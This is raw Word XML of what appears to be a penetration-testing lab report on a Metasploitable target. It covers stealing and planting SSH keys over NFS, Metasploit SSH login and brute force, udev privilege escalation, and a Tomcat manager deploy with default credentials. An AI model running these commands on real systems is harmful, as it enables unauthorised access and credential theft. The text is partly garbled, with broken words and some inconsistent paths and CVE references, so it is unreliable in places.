    <w:p w14:paraId="1C88C0B8" w14:textId="5FAA1070" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">But I have enough permissions to go a er the private auxiliary/scanner/ssh/ssh_login_pubkey can be used.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D53DE" w14:textId="5FB90587" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This module uses the private key to do two things:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A272100" w14:textId="74A09D59" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Get access to the vi</w:t>
      </w:r>
      <w:r w:rsidR="00195F62">
        <w:t>cti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">m machine  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29BD11" w14:textId="2030656A" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Get access to any machines that trust the vic</w:t>
      </w:r>
      <w:r w:rsidR="00195F62">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t>m's private key (must be listed in the SSH files of the vic</w:t>
      </w:r>
      <w:r w:rsidR="00195F62">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">m machine)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E46F444" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Obtaining Private Key  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FA00C" w14:textId="47335093" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>To carry out this a</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A33">
        <w:t>tt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ack, you will need to have access to the file system, and/or be able to mount the remote file system (which, on Metasploitable, happens to be possible!): see Metasploitable/NFS  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395D63C" w14:textId="05B37124" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Once you've got access to the file system, you'll grab a copy of the remote machine's private keys, and use them together with Metasploit to obtain access to the machine.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AC87E" w14:textId="57B39442" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">(Note that you could also plant your keys on the target, by adding your public SSH keys onto the target machine's list of trusted machines, but this technique would restrict you to a par cular machine, wile the Metasploit method is portable and less intrusive.)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E201D" w14:textId="0BB18B84" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">To snatch the target's private key:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262E3E8" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># service rpcbind start  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE204A" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># mkdir /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB964AA" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># mount -t nfs 10.0.0.27:/ /temp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57A6EC" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/r00tprivatekey  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB8B6B" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># umount /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F37C3" w14:textId="5BE231DD" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Now you have a copy of the msfadmin account's private SSH key.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC1F7E" w14:textId="1B5DC8AE" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Metasploit We'll use Metasploit to turn this into access to the remote machine.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC0FA6" w14:textId="47EBB1ED" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This key is also useful for impersona ng the target when connec ng to OTHER remote machines.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49812F77" w14:textId="236D446D" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Plan</w:t>
      </w:r>
      <w:r w:rsidR="00C2401A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ng Private Keys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06D21A" w14:textId="0F327C89" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>An alterna</w:t>
      </w:r>
      <w:r w:rsidR="00C2401A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t>ve method to gain access, although it is not useful for gaining access to any machines other than the vic</w:t>
      </w:r>
      <w:r w:rsidR="00C2401A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t>m machine, is to GENERATE a public/private SSH key pair from the a acker machine, and copy the PRIVATE key over to the remote machine. (Using the public key and the above-men</w:t>
      </w:r>
      <w:r w:rsidR="00C2401A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t>oned technique would be easier, but it's worth men</w:t>
      </w:r>
      <w:r w:rsidR="00C2401A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oning at least.)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB72289" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4BB9D" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">To plant your private keys on the remote machine, you'll need write access to the target user's home directory. You'll generate a public SSH key from the a acker machine, the machine you want to have access WITH, and add it to the other machine's ~/.ssh/authorized_keys.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E2159" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAC5A6" w14:textId="2E9DAB7C" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This presumes the .ssh directory exists. If it doesn't exist, you can make it, and tamper with the filesystem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C81F1B" w14:textId="722D3960" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Running the A</w:t>
      </w:r>
      <w:r w:rsidR="00405ED6">
        <w:t>tt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ack  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E4C77" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Execute the attack, to use the remote machine's private key to gain access to the remote machine:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A83C3D" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; run  ssh login brute force </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C16194" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00101BC7" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00FB3914">
        <w:t xml:space="preserve"># service rpcbind start  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C92FB3" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># mkdir /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637C411" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># mount -t nfs 192.168.254.182:/ /temp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74697213" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># cd /tmp/target/home/msfadmin/ &amp;&amp; mkdir .ssh/  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A420F" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># echo ~/.ssh/id_rsa &gt;&gt; /tmp/target/home/msfadmin/.ssh/authorized_keys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4E251" w14:textId="31BA63C6" w:rsidR="001F694B" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t># umount /tmp/targ</w:t>
      </w:r>
      <w:r w:rsidR="001F694B">
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC4179" w14:textId="58E8C4DB" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Settinng Up the ATTack  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68AA2D" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Here's info on the auxiliary/scanner/ssh/ssh_login_pubkey module in Metasploit, which will carry out the attack:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29557DC8" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">use auxiliary/scanner/ssh/ssh_login_pubkey  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC717D4" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Set some op ons, such as the private key file, the username to log in with, and the remote host:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887F441" w14:textId="77777777" w:rsidR="001F694B" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; set KEY_FILE /tmp/r00tprivatekey KEY_FILE =&gt; /tmp/id_rsa auxiliary(ssh_login_pubkey) &gt; set USERNAME root USERNAME =&gt; root  auxiliary(ssh_login_pubkey) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">RHOSTS 192.168.254.186 set RHOSTS =&gt; 192.168.254.186 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA065F" w14:textId="5692605F" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">msf auxiliary(ssh_login_pubkey) &gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640322A2" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Running the attack  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03469F95" w14:textId="77777777" w:rsidR="005B2E1D" w:rsidRDefault="005B2E1D" w:rsidP="005B2E1D">
      <w:r>
        <w:t xml:space="preserve">Execute the attack, to use the remote machine's private key to gain access to the remote machine:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B9CD1" w14:textId="0D8B0334" w:rsidR="00101BC7" w:rsidRDefault="005B2E1D" w:rsidP="005B2E1D">
      <w:r>
        <w:t xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37047FEA" w14:textId="173BC4BF" w:rsidR="005231AC" w:rsidRDefault="005231AC" w:rsidP="005231AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc155092372"/>
      <w:r>
        <w:t>Brute force ssh</w:t>
      </w:r>
      <w:r w:rsidR="00852076">
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6323C893" w14:textId="77777777" w:rsidR="005231AC" w:rsidRPr="005231AC" w:rsidRDefault="005231AC" w:rsidP="005231AC"/>
    <w:p w14:paraId="7C01CFCD" w14:textId="6D1DE19E" w:rsidR="00D159D6" w:rsidRDefault="005231AC" w:rsidP="005B2E1D">
      <w:r w:rsidRPr="005231AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3298770F" wp14:editId="74F82A18">
            <wp:extent cx="5731510" cy="5638800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13898348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5638800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BE1A7" w14:textId="232EE46A" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:r w:rsidR="005231AC">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A546A" w14:textId="26ECBACE" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>Got me in to the session as msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D26F8EB" w14:textId="282BED93" w:rsidR="001B7057" w:rsidRDefault="001B7057" w:rsidP="00101BC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I re-ran and I was able to brute force the root to using the same </w:t>
      </w:r>
      <w:r w:rsidR="00894A1A">
        <w:t>method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D81280" w14:textId="6BAA0D8E" w:rsidR="0080133C" w:rsidRDefault="0017668D" w:rsidP="0017668D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc155092373"/>
      <w:r w:rsidRPr="0017668D">
        <w:t>Linux udev Netlink Local Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="468C20A8" w14:textId="59DF9672" w:rsidR="001B7057" w:rsidRDefault="0080133C" w:rsidP="00101BC7">
      <w:r w:rsidRPr="0080133C">
        <w:t>use exploit/linux/local/udev_netlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4152C" w14:textId="033FA02B" w:rsidR="00CE4DA1" w:rsidRDefault="00CE4DA1" w:rsidP="00101BC7">
      <w:r>
        <w:t>show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358BB148" w14:textId="48085688" w:rsidR="00CE4DA1" w:rsidRDefault="00CE4DA1" w:rsidP="00101BC7">
      <w:r w:rsidRPr="00CE4DA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02EC7CD9" wp14:editId="19267E25">
            <wp:extent cx="5731510" cy="5450840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13882735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73516" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5450840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58416C86" w14:textId="635F7C10" w:rsidR="007E16ED" w:rsidRDefault="007E16ED" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">I was then able to use a session from a different attack to escalate privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1012C2" w14:textId="1DB7BC4C" w:rsidR="007D2B9F" w:rsidRPr="008314C5" w:rsidRDefault="007D2B9F" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc155092374"/>
      <w:r w:rsidRPr="008314C5">
        <w:t>Port 8180</w:t>
      </w:r>
      <w:r w:rsidR="008E4971">
        <w:t xml:space="preserve"> Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="09E9D642" w14:textId="639B0B39" w:rsidR="007D2B9F" w:rsidRDefault="007D2B9F" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">First let’s see what’s running on 8180   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE730BF" w14:textId="1344A65A" w:rsidR="007D2B9F" w:rsidRDefault="000F091D" w:rsidP="007D2B9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D26E300" wp14:editId="61FF1E92">
            <wp:extent cx="5736590" cy="2219325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1714895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6590" cy="2219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61359071" w14:textId="77777777" w:rsidR="00741970" w:rsidRDefault="00741970" w:rsidP="00741970">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tomcat 5.5Commands    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5555B" w14:textId="0FC831B1" w:rsidR="00741970" w:rsidRDefault="00741970" w:rsidP="00741970">
      <w:r>
        <w:t xml:space="preserve">(CVE  2007-2447):http://www.cvedetails.com/cve/cve-2007-2447  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00702C8E" w14:textId="64C5784F" w:rsidR="000F091D" w:rsidRDefault="00741970" w:rsidP="00741970">
      <w:r>
        <w:t xml:space="preserve">use exploit/multi/http/tomcat_mgr_deploy   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D4D38" w14:textId="49D841F9" w:rsidR="00384326" w:rsidRDefault="00384326" w:rsidP="00384326">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0867C520" wp14:editId="7DEA00FB">
            <wp:extent cx="5731510" cy="1824614"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="992" name="Picture 99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992" name="Picture 992" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1824614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="657AEA58" w14:textId="77777777" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">Note set TARGET is already set to 0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77430C57" w14:textId="623D51E0" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">Now set:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2916C265" w14:textId="2F1FEFE6" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set HttpUsername tomcat </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760FB50" w14:textId="77777777" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set HttpPassword tomcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2CC9E" w14:textId="51C28973" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set  RHOST 192.168.254.186 set  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CB5C5" w14:textId="6E1FA9C1" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">RPORT 8180 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57820499" w14:textId="1E66B926" w:rsidR="00062B58" w:rsidRDefault="00AB4A6A" w:rsidP="00062B58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1E8B57" wp14:editId="786D9129">
            <wp:extent cx="5730875" cy="1640205"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="6063867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3F8352F4" w14:textId="59FE522C" w:rsidR="00F249B5" w:rsidRDefault="00F249B5" w:rsidP="00062B58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259B3437" wp14:editId="09032DBD">
            <wp:extent cx="5727700" cy="1162685"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19750121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1162685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F518744" w14:textId="21D55E97" w:rsidR="00F249B5" w:rsidRDefault="009E6717" w:rsidP="00062B58">
      <w:r w:rsidRPr="009E6717">
        <w:t xml:space="preserve">So I changed from the meterpreter to shell   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F66FF2" w14:textId="06014124" w:rsidR="00C107DA" w:rsidRDefault="00C107DA" w:rsidP="00062B58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E04D7E" wp14:editId="0312DEFD">
            <wp:extent cx="5725160" cy="3468370"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="673696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3468370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C5083" w14:textId="3E8F8028" w:rsidR="00DC51D3" w:rsidRDefault="00DC51D3" w:rsidP="00DC51D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc155092375"/>
      <w:r>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC51D3">
        <w:t>8009</w:t>
      </w:r>
      <w:r w:rsidR="000E75D2">
        <w:t xml:space="preserve"> AjP13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA7107" w:rsidRPr="00AA7107">
        <w:t>NVT: Apache Tomcat AJP RCE Vulnerability (Ghostcat)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="44012F36" w14:textId="0719B145" w:rsidR="00AA7107" w:rsidRPr="00AA7107" w:rsidRDefault="00AA7107" w:rsidP="00AA7107">
      <w:r>
        <w:t>Please refer to the GVM report page 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99A3FB" w14:textId="1B68F359" w:rsidR="00F031D2" w:rsidRDefault="00F031D2" w:rsidP="00DC51D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F279B1" w14:textId="3066F51D" w:rsidR="007A110C" w:rsidRDefault="007A110C" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc155092376"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 5432</w:t>
      </w:r>
      <w:r w:rsidR="00C35A64">
        <w:t xml:space="preserve"> post</w:t>
      </w:r>
      <w:r w:rsidR="008E4971">
        <w:t>gres</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="231D58F6" w14:textId="01D0C294" w:rsidR="009D1027" w:rsidRPr="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>Nmap output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F91CA3" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCA1D0" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C686123" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B633483" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>|_Not valid after:  2010-04-16T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2534A" w14:textId="77777777" w:rsidR="009D1027" w:rsidRPr="00181A83" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>|_ssl-date: 2024-01-02T09:58:53+00:00; +1s from scanner time</w:t>
      </w:r>
    </w:p>
